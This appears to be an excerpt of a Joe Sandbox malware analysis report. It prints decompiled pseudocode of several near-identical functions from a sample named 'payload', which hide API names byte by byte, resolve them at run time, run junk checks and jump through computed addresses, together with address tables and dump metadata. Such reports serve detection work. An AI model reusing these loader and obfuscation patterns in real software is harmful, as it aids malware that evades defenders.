					__eflags = _t49 - 0xfd00;
					if(_t49 < 0xfd00) {
						goto L16;
					}
					 *0x305061 = 0x6b;
					 *0x00305062 = 0x65;
					 *0x00305063 = 0x72;
					 *0x00305064 = 0x6e;
					 *0x00305065 = 0x65;
					 *0x00305066 = 0x6c;
					 *0x00305067 = 0x33;
					_t17 = LoadLibraryA("kernel32.dll");
					 *0x40500e = _t17;
					_t39 = "pejpCreate";
					 *_t39 = 0x70616548;
					 *((short*)(_t39 + 4)) = 0x7243;
					 *((short*)(_t39 + 6)) = 0x6165;
					_push(_t39);
					_push(_t17);
					_push(__imp__LoadLibraryExW);
					_pop( *0x40500a);
					_push(_t17);
					_push(1);
					 *_t51 =  *_t51 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t18 = E00401CAE(_t17); // executed
					__eflags = _t18;
					if(_t18 != 0) {
						goto L16;
					}
					L"oidsapi.dll" = 0x6e;
					M00405038 = 0x74;
					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
					 *((intOrPtr*)(_t49 - 4)) = _t21;
					_push(_t21);
					__eflags = _t21;
					if(_t21 == 0) {
						goto L16;
					}
					_push("zzdjjqpqaxlgt"); // executed
					_t22 = E00402E18(_t21); // executed
					_push("true");
					 *_t51 =  *_t51 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz"); // executed
					_t23 = E00402BB3(_t22); // executed
					__eflags = _t23;
					if(_t23 != 0) {
						goto L16;
					}
					_push(0x1e);
					do {
						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
						 *_t51 =  *_t51 - 1;
						__eflags =  *_t51;
					} while ( *_t51 != 0);
					 *0x40501a = 0;
					_push("zzdjjqpqaxlgt"); // executed
					E00402E18(_t25); // executed
					_pop(_t43);
					 *((intOrPtr*)(_t51 + 4)) =  *((intOrPtr*)(_t51 + 4)) +  *((intOrPtr*)(_t43 + 0x3c));
					_t47 = _t43;
					 *0x405002 = _t47 + 0xa4;
					_t27 =  *0x405002;
					_t28 =  *_t27;
					 *0x405002 = _t28;
					__eflags =  *0x405002 - 0xfff;
					if(__eflags > 0) {
						goto L16;
					}
					asm("sbb dword [ecx], 0xa0");
					if(__eflags < 0) {
						goto L16;
					}
					 *0x405016 = GetProcAddress();
					LoadLibraryA("kernel32.dll");
					 *0x40501a = E004019C6;
					_push(E00402749);
					_pop(_t33);
					 *0x40501a =  *0x40501a + _t33;
					__eflags =  *((intOrPtr*)(_t49 - 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t49 - 4)) != 0xffffffff) {
						 *0x40501a =  *0x40501a - E00402749;
						goto __eax;
					}
					 *0x40501a =  *0x40501a ^ E004019C6;
					goto __eax;
				}
				_push("zzdjjqpqaxlgt");
				_t36 = E00402E18(_t12);
				_push("zzdjjqpqaxlgt");
				_t37 = E00402E18(_t36);
				_push(1);
				 *_t51 =  *_t51 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t37) != 0) {
					goto L4;
				}
				_push(1);
				 *_t51 =  *_t51 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(_t12 != 0) {
					goto L4;
				}
				_push(E00402749);
				return E00402749;
			}





















    0x00401000
    0x00401002
    0x00401005
    0x0040100a
    0x00401017
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x0040101d
    0x00401022
    0x00401027
    0x0040102c
    0x00401031
    0x00401033
    0x00401036
    0x0040103b
    0x00401048
    0x00000000
    0x00000000
    0x0040104e
    0x00401050
    0x00401053
    0x00401058
    0x00401065
    0x00000000
    0x00000000
    0x00401071
    0x00401072

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00401D28, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135synchronization
    C-Code - Quality: 48%
    			E00401D28() {
				void* _t11;
				intOrPtr _t13;
				struct HINSTANCE__* _t17;
				intOrPtr _t18;
				struct HINSTANCE__* _t21;
				void* _t22;
				intOrPtr _t23;
				long _t25;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t33;
				void* _t36;
				intOrPtr* _t39;
				void* _t43;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;

				_push(0xf);
				 *_t51 =  *_t51 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t11) != 0) {
					L4:
					_push(1);
					 *_t51 =  *_t51 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t13 = E00401CAE(_t12); // executed
					__eflags = _t13;
					if(_t13 != 0) {
						L16:
						L17:
						goto L17;
					}
					__eflags = _t49 - 0xfd00;
					if(_t49 < 0xfd00) {
						goto L16;
					}
					 *0x305061 = 0x6b;
					 *0x00305062 = 0x65;
					 *0x00305063 = 0x72;
					 *0x00305064 = 0x6e;
					 *0x00305065 = 0x65;
					 *0x00305066 = 0x6c;
					 *0x00305067 = 0x33;
					_t17 = LoadLibraryA("kernel32.dll");
					 *0x40500e = _t17;
					_t39 = "pejpCreate";
					 *_t39 = 0x70616548;
					 *((short*)(_t39 + 4)) = 0x7243;
					 *((short*)(_t39 + 6)) = 0x6165;
					_push(_t39);
					_push(_t17);
					_push(__imp__LoadLibraryExW);
					_pop( *0x40500a);
					_push(_t17);
					_push(1);
					 *_t51 =  *_t51 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t18 = E00401CAE(_t17); // executed
					__eflags = _t18;
					if(_t18 != 0) {
						goto L16;
					}
					L"oidsapi.dll" = 0x6e;
					M00405038 = 0x74;
					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
					 *((intOrPtr*)(_t49 - 4)) = _t21;
					_push(_t21);
					__eflags = _t21;
					if(_t21 == 0) {
						goto L16;
					}
					_push("zzdjjqpqaxlgt"); // executed
					_t22 = E00402E18(_t21); // executed
					_push("true");
					 *_t51 =  *_t51 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz"); // executed
					_t23 = E00402BB3(_t22); // executed
					__eflags = _t23;
					if(_t23 != 0) {
						goto L16;
					}
					_push(0x1e);
					do {
						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
						 *_t51 =  *_t51 - 1;
						__eflags =  *_t51;
					} while ( *_t51 != 0);
					 *0x40501a = 0;
					_push("zzdjjqpqaxlgt"); // executed
					E00402E18(_t25); // executed
					_pop(_t43);
					 *((intOrPtr*)(_t51 + 4)) =  *((intOrPtr*)(_t51 + 4)) +  *((intOrPtr*)(_t43 + 0x3c));
					_t47 = _t43;
					 *0x405002 = _t47 + 0xa4;
					_t27 =  *0x405002;
					_t28 =  *_t27;
					 *0x405002 = _t28;
					__eflags =  *0x405002 - 0xfff;
					if(__eflags > 0) {
						goto L16;
					}
					asm("sbb dword [ecx], 0xa0");
					if(__eflags < 0) {
						goto L16;
					}
					 *0x405016 = GetProcAddress();
					LoadLibraryA("kernel32.dll");
					 *0x40501a = E004019C6;
					_push(E00402749);
					_pop(_t33);
					 *0x40501a =  *0x40501a + _t33;
					__eflags =  *((intOrPtr*)(_t49 - 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t49 - 4)) != 0xffffffff) {
						 *0x40501a =  *0x40501a - E00402749;
						goto __eax;
					}
					 *0x40501a =  *0x40501a ^ E004019C6;
					goto __eax;
				}
				_push( *0x4050cf);
				_t36 = E00402AD0(_t12);
				_push(0xf);
				 *_t51 =  *_t51 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t36) != 0) {
					goto L4;
				}
				_push(0xf);
				 *_t51 =  *_t51 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t12 != 0) {
					goto L4;
				}
				_push( *0x4050cf);
				E00402AD0(_t12);
				_push(E00402CDE);
				return E00402CDE;
			}




















    0x00401d28
    0x00401d2a
    0x00401d2d
    0x00401d32
    0x00401d3f
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401d45
    0x00401d4b
    0x00401d50
    0x00401d52
    0x00401d55
    0x00401d5a
    0x00401d67
    0x00000000
    0x00000000
    0x00401d6d
    0x00401d6f
    0x00401d72
    0x00401d77
    0x00401d83
    0x00000000
    0x00000000
    0x00401d89
    0x00401d8f
    0x00401d9a
    0x00401d9b

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00401CB5, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135synchronization
    C-Code - Quality: 48%
    			E00401CB5() {
				void* _t11;
				intOrPtr _t13;
				struct HINSTANCE__* _t17;
				intOrPtr _t18;
				struct HINSTANCE__* _t21;
				void* _t22;
				intOrPtr _t23;
				long _t25;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t33;
				void* _t36;
				intOrPtr* _t39;
				void* _t43;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;

				_push(0xf);
				 *_t51 =  *_t51 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t11) != 0) {
					L4:
					_push(1);
					 *_t51 =  *_t51 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t13 = E00401CAE(_t12); // executed
					__eflags = _t13;
					if(_t13 != 0) {
						L16:
						L17:
						goto L17;
					}
					__eflags = _t49 - 0xfd00;
					if(_t49 < 0xfd00) {
						goto L16;
					}
					 *0x305061 = 0x6b;
					 *0x00305062 = 0x65;
					 *0x00305063 = 0x72;
					 *0x00305064 = 0x6e;
					 *0x00305065 = 0x65;
					 *0x00305066 = 0x6c;
					 *0x00305067 = 0x33;
					_t17 = LoadLibraryA("kernel32.dll");
					 *0x40500e = _t17;
					_t39 = "pejpCreate";
					 *_t39 = 0x70616548;
					 *((short*)(_t39 + 4)) = 0x7243;
					 *((short*)(_t39 + 6)) = 0x6165;
					_push(_t39);
					_push(_t17);
					_push(__imp__LoadLibraryExW);
					_pop( *0x40500a);
					_push(_t17);
					_push(1);
					 *_t51 =  *_t51 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t18 = E00401CAE(_t17); // executed
					__eflags = _t18;
					if(_t18 != 0) {
						goto L16;
					}
					L"oidsapi.dll" = 0x6e;
					M00405038 = 0x74;
					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
					 *((intOrPtr*)(_t49 - 4)) = _t21;
					_push(_t21);
					__eflags = _t21;
					if(_t21 == 0) {
						goto L16;
					}
					_push("zzdjjqpqaxlgt"); // executed
					_t22 = E00402E18(_t21); // executed
					_push("true");
					 *_t51 =  *_t51 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz"); // executed
					_t23 = E00402BB3(_t22); // executed
					__eflags = _t23;
					if(_t23 != 0) {
						goto L16;
					}
					_push(0x1e);
					do {
						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
						 *_t51 =  *_t51 - 1;
						__eflags =  *_t51;
					} while ( *_t51 != 0);
					 *0x40501a = 0;
					_push("zzdjjqpqaxlgt"); // executed
					E00402E18(_t25); // executed
					_pop(_t43);
					 *((intOrPtr*)(_t51 + 4)) =  *((intOrPtr*)(_t51 + 4)) +  *((intOrPtr*)(_t43 + 0x3c));
					_t47 = _t43;
					 *0x405002 = _t47 + 0xa4;
					_t27 =  *0x405002;
					_t28 =  *_t27;
					 *0x405002 = _t28;
					__eflags =  *0x405002 - 0xfff;
					if(__eflags > 0) {
						goto L16;
					}
					asm("sbb dword [ecx], 0xa0");
					if(__eflags < 0) {
						goto L16;
					}
					 *0x405016 = GetProcAddress();
					LoadLibraryA("kernel32.dll");
					 *0x40501a = E004019C6;
					_push(E00402749);
					_pop(_t33);
					 *0x40501a =  *0x40501a + _t33;
					__eflags =  *((intOrPtr*)(_t49 - 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t49 - 4)) != 0xffffffff) {
						 *0x40501a =  *0x40501a - E00402749;
						goto __eax;
					}
					 *0x40501a =  *0x40501a ^ E004019C6;
					goto __eax;
				}
				_push("zzdjjqpqaxlgt");
				_t36 = E00402E18(_t12);
				_push(0xf);
				 *_t51 =  *_t51 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t36) != 0) {
					goto L4;
				}
				_push(0xf);
				 *_t51 =  *_t51 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t12 != 0) {
					goto L4;
				}
				_push("zzdjjqpqaxlgt");
				E00402E18(_t12);
				_push(E004023F0);
				return E004023F0;
			}




















    0x00401cb5
    0x00401cb7
    0x00401cba
    0x00401cbf
    0x00401ccc
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401cd2
    0x00401cd7
    0x00401cdc
    0x00401cde
    0x00401ce1
    0x00401ce6
    0x00401cf2
    0x00000000
    0x00000000
    0x00401cf8
    0x00401cfa
    0x00401cfd
    0x00401d02
    0x00401d0e
    0x00000000
    0x00000000
    0x00401d14
    0x00401d19
    0x00401d24
    0x00401d25

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00402183, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 134synchronization
    C-Code - Quality: 48%
    			E00402183() {
				void* _t11;
				void* _t12;
				void* _t14;
				struct HINSTANCE__* _t18;
				void* _t19;
				struct HINSTANCE__* _t22;
				void* _t23;
				void* _t24;
				long _t26;
				intOrPtr* _t28;
				intOrPtr _t29;
				void* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr* _t42;
				void* _t46;
				void* _t50;
				void* _t52;
				intOrPtr* _t54;
				void* _t63;

				_push("zzdjjqpqaxlgt");
				_t12 = E00402E18(_t11);
				_push(1);
				 *_t54 =  *_t54 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t12) != 0) {
					L1:
					_push(1);
					 *_t54 =  *_t54 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t14 = E00401CAE(_t13); // executed
					if(_t14 != 0 || _t52 < 0xfd00) {
						L15:
						L16:
						goto L16;
					} else {
						 *0x305061 = 0x6b;
						 *0x00305062 = 0x65;
						 *0x00305063 = 0x72;
						 *0x00305064 = 0x6e;
						 *0x00305065 = 0x65;
						 *0x00305066 = 0x6c;
						 *0x00305067 = 0x33;
						_t18 = LoadLibraryA("kernel32.dll");
						 *0x40500e = _t18;
						_t42 = "pejpCreate";
						 *_t42 = 0x70616548;
						 *((short*)(_t42 + 4)) = 0x7243;
						 *((short*)(_t42 + 6)) = 0x6165;
						_push(_t42);
						_push(_t18);
						_push(__imp__LoadLibraryExW);
						_pop( *0x40500a);
						_push(_t18);
						_push(1);
						 *_t54 =  *_t54 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t19 = E00401CAE(_t18); // executed
						if(_t19 != 0) {
							goto L15;
						}
						L"oidsapi.dll" = 0x6e;
						M00405038 = 0x74;
						_t22 = LoadLibraryExW( &((L"")[1]), 0, 0);
						 *((intOrPtr*)(_t52 - 4)) = _t22;
						_push(_t22);
						if(_t22 == 0) {
							goto L15;
						}
						_push("zzdjjqpqaxlgt"); // executed
						_t23 = E00402E18(_t22); // executed
						_push("true");
						 *_t54 =  *_t54 - 1;
						_push(0x4050b3);
						_push("bkktdsxxkjueaz"); // executed
						_t24 = E00402BB3(_t23); // executed
						if(_t24 != 0) {
							goto L15;
						}
						_push(0x1e);
						do {
							_t26 = WaitForSingleObject(0xffffffff, 1); // executed
							 *_t54 =  *_t54 - 1;
						} while ( *_t54 != 0);
						_t54 = _t54 + 4;
						 *0x40501a = 0;
						_push("zzdjjqpqaxlgt"); // executed
						E00402E18(_t26); // executed
						_pop(_t46);
						 *_t54 =  *_t54 +  *((intOrPtr*)(_t46 + 0x3c));
						_t50 = _t46;
						 *0x405002 = _t50 + 0xa4;
						_t28 =  *0x405002;
						_t29 =  *_t28;
						 *0x405002 = _t29;
						_t63 =  *0x405002 - 0xfff;
						if(_t63 > 0) {
							goto L15;
						}
						asm("sbb dword [ecx], 0xa0");
						if(_t63 < 0) {
							goto L15;
						}
						 *0x405016 = GetProcAddress();
						LoadLibraryA("kernel32.dll");
						 *0x40501a = E004019C6;
						_push(E00402749);
						_pop(_t34);
						 *0x40501a =  *0x40501a + _t34;
						if( *((intOrPtr*)(_t52 - 4)) != 0xffffffff) {
							 *0x40501a =  *0x40501a - E00402749;
							_t35 =  *0x40501a; // 0x0
							goto __eax;
						}
						 *0x40501a =  *0x40501a ^ E004019C6;
						goto __eax;
					}
				}
				_push( *0x4050cf);
				_t36 = E00402AD0(_t35);
				_push( *0x4050cf);
				_t37 = E00402AD0(_t36);
				_push(1);
				 *_t54 =  *_t54 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t37) != 0) {
					goto L1;
				}
				_push("zzdjjqpqaxlgt");
				_t38 = E00402E18(_t13);
				_push("zzdjjqpqaxlgt");
				E00402E18(_t38);
				_push(E004024DE);
				return E004024DE;
			}

























    0x00402183
    0x00402188
    0x0040218d
    0x0040218f
    0x00402192
    0x00402197
    0x004021a3
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x00401e4b
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f27
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb7
    0x00401fca
    0x00401fd4
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401e34
    0x004021a9
    0x004021af
    0x004021b4
    0x004021ba
    0x004021bf
    0x004021c1
    0x004021c4
    0x004021c9
    0x004021d5
    0x00000000
    0x00000000
    0x004021db
    0x004021e0
    0x004021e5
    0x004021ea
    0x004021f5
    0x004021f6

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 004015CA, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 130synchronization
    C-Code - Quality: 50%
    			E004015CA() {
				void* _t11;
				void* _t12;
				void* _t13;
				intOrPtr _t15;
				struct HINSTANCE__* _t19;
				intOrPtr _t20;
				struct HINSTANCE__* _t23;
				void* _t24;
				intOrPtr _t25;
				long _t27;
				intOrPtr* _t29;
				intOrPtr _t30;
				void* _t35;
				void* _t38;
				intOrPtr* _t40;
				void* _t44;
				void* _t48;
				void* _t50;
				intOrPtr* _t52;

				_push("zzdjjqpqaxlgt");
				_t12 = E00402E18(_t11);
				_push("zzdjjqpqaxlgt");
				_t13 = E00402E18(_t12);
				_push(0xf);
				 *_t52 =  *_t52 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t13) != 0) {
					L3:
					_push(1);
					 *_t52 =  *_t52 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t15 = E00401CAE(_t14); // executed
					__eflags = _t15;
					if(_t15 != 0) {
						L15:
						L16:
						goto L16;
					}
					__eflags = _t50 - 0xfd00;
					if(_t50 < 0xfd00) {
						goto L15;
					}
					 *0x305061 = 0x6b;
					 *0x00305062 = 0x65;
					 *0x00305063 = 0x72;
					 *0x00305064 = 0x6e;
					 *0x00305065 = 0x65;
					 *0x00305066 = 0x6c;
					 *0x00305067 = 0x33;
					_t19 = LoadLibraryA("kernel32.dll");
					 *0x40500e = _t19;
					_t40 = "pejpCreate";
					 *_t40 = 0x70616548;
					 *((short*)(_t40 + 4)) = 0x7243;
					 *((short*)(_t40 + 6)) = 0x6165;
					_push(_t40);
					_push(_t19);
					_push(__imp__LoadLibraryExW);
					_pop( *0x40500a);
					_push(_t19);
					_push(1);
					 *_t52 =  *_t52 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t20 = E00401CAE(_t19); // executed
					__eflags = _t20;
					if(_t20 != 0) {
						goto L15;
					}
					L"oidsapi.dll" = 0x6e;
					M00405038 = 0x74;
					_t23 = LoadLibraryExW( &((L"")[1]), 0, 0);
					 *((intOrPtr*)(_t50 - 4)) = _t23;
					_push(_t23);
					__eflags = _t23;
					if(_t23 == 0) {
						goto L15;
					}
					_push("zzdjjqpqaxlgt"); // executed
					_t24 = E00402E18(_t23); // executed
					_push("true");
					 *_t52 =  *_t52 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz"); // executed
					_t25 = E00402BB3(_t24); // executed
					__eflags = _t25;
					if(_t25 != 0) {
						goto L15;
					}
					_push(0x1e);
					do {
						_t27 = WaitForSingleObject(0xffffffff, 1); // executed
						 *_t52 =  *_t52 - 1;
						__eflags =  *_t52;
					} while ( *_t52 != 0);
					 *0x40501a = 0;
					_push("zzdjjqpqaxlgt"); // executed
					E00402E18(_t27); // executed
					_pop(_t44);
					 *((intOrPtr*)(_t52 + 4)) =  *((intOrPtr*)(_t52 + 4)) +  *((intOrPtr*)(_t44 + 0x3c));
					_t48 = _t44;
					 *0x405002 = _t48 + 0xa4;
					_t29 =  *0x405002;
					_t30 =  *_t29;
					 *0x405002 = _t30;
					__eflags =  *0x405002 - 0xfff;
					if(__eflags > 0) {
						goto L15;
					}
					asm("sbb dword [ecx], 0xa0");
					if(__eflags < 0) {
						goto L15;
					}
					 *0x405016 = GetProcAddress();
					LoadLibraryA("kernel32.dll");
					 *0x40501a = E004019C6;
					_push(E00402749);
					_pop(_t35);
					 *0x40501a =  *0x40501a + _t35;
					__eflags =  *((intOrPtr*)(_t50 - 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t50 - 4)) != 0xffffffff) {
						 *0x40501a =  *0x40501a - E00402749;
						goto __eax;
					}
					 *0x40501a =  *0x40501a ^ E004019C6;
					goto __eax;
				}
				_push( *0x4050cf);
				_t38 = E00402AD0(_t14);
				_push(1);
